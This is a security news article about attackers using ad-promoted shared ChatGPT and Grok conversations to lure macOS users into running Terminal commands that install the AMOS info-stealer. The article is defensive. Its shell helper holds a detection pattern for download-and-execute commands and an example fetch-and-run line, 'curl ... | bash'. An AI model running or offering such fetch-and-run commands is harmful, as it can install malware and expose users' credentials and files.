Attackers Are Distributing Malware Through ChatGPT

You (hopefully) already know that you shouldn’t take everything AI says at face value. Large language models (LLMs) sometimes provide incorrect information, and attackers are now using paid Google ads to promote shared ChatGPT and Grok conversations that look like tech support instructions but actually trick macOS users into installing information-stealing malware.
This campaign is a variation of the ClickFix attack, which often uses CAPTCHA prompts or fake error messages to trick victims into executing malicious commands. However, in this case, the instructions are disguised as helpful troubleshooting guides for legitimate AI-powered platforms.
How attackers exploit ChatGPT
Kaspersky describes one such campaign in detail, aimed at macOS users looking for OpenAI’s Atlas browser. A Google search for “chatgpt atlas” may surface a sponsored result linking to chatgpt.com, with a page titled “ChatGPT™ Atlas for macOS – Download ChatGPT Atlas for Mac.” Clicking the ad takes you to the official ChatGPT website and a set of instructions for (supposedly) installing Atlas.
However, the page is actually a shared ChatGPT conversation — a chat that any user can publish via a public link — repurposed as a malware installation guide. The chat instructs you to copy, paste, and run a command in your Mac’s Terminal and to grant it all requested permissions, which installs AMOS (Atomic macOS Stealer) on your device.
Further investigation by Huntress found similar malicious shared conversations surfacing in both ChatGPT and Grok results for more general troubleshooting queries such as “how to delete system data on Mac” and “clean up disk space on macOS.”
AMOS targets macOS, gaining elevated privileges that let attackers execute commands, record keystrokes, and deliver additional malware. BleepingComputer notes that the stealer also targets cryptocurrency wallets, browser data (including cookies, saved passwords, and autofill entries), macOS keychain data, and local files.
You shouldn’t trust every AI-generated command
When troubleshooting technical issues, carefully vet any instructions you find online. Attackers often use sponsored search results and social media to spread instructions that are actually ClickFix attacks. Never follow instructions you don’t understand, and remember that if you’re asked to run PowerShell or Terminal commands on your device to “fix” a problem, there’s a good chance the instructions are malicious — even if they come from a search engine or LLM you’ve used and trusted before.
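Before running any pasted command, it helps to look for the patterns ClickFix-style lures rely on, such as piping a remote download straight into a shell or decoding base64 into a shell. The sketch below is a hypothetical helper (the function name and patterns are illustrative, not from the reported campaign) that flags a few of these red flags; it is a crude heuristic, not a substitute for reading and understanding the command.

```shell
#!/bin/sh
# Hypothetical helper: scan a pasted command for patterns common in
# ClickFix-style lures BEFORE you ever run it in Terminal.
# Heuristic only -- absence of a match does not mean a command is safe.

check_cmd() {
  cmd="$1"
  # Red flags checked here:
  #  - curl/wget output piped directly into sh or bash
  #  - base64-decoded data piped into a shell
  #  - xattr used to strip macOS quarantine attributes
  if printf '%s' "$cmd" | grep -Eq \
    '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh|base64[[:space:]]+(-d|--decode)[^|]*\|[[:space:]]*(ba)?sh|xattr[[:space:]]+-[cdr]'
  then
    echo "SUSPICIOUS"
  else
    echo "no obvious red flags (still read it line by line)"
  fi
}

check_cmd 'curl -s https://example.com/install.sh | bash'   # flagged
check_cmd 'ls -la ~/Documents'                              # not flagged
```

If a command downloads a script, a safer habit is to save it to a file and read it first, rather than piping it straight into a shell.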
Of course, you can also turn AI against the attack: paste the instructions into a new ChatGPT conversation and ask whether they are safe to execute. According to Kaspersky, the model will tell you if they are unsafe.